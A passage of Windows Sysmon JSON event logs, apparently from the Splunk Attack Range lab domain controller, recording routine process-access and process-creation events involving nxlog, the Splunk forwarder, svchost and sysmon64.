{"EventTime":"2020-08-01 06:52:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:55.484\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:55.484","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.485\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.485","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.502\r\nProcessGuid: {E2A3D6B1-1148-5F25-0000-0010450F0600}\r\nProcessId: 860\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.502","ProcessGuid":"{E2A3D6B1-1148-5F25-0000-0010450F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1148-5F25-0000-0010450F0600}\r\nTargetProcessId: 860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1148-5F25-0000-0010450F0600}","TargetProcessId":"860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1148-5F25-0000-0010450F0600}\r\nTargetProcessId: 860\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1148-5F25-0000-0010450F0600}","TargetProcessId":"860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:56.501\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:56.501","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\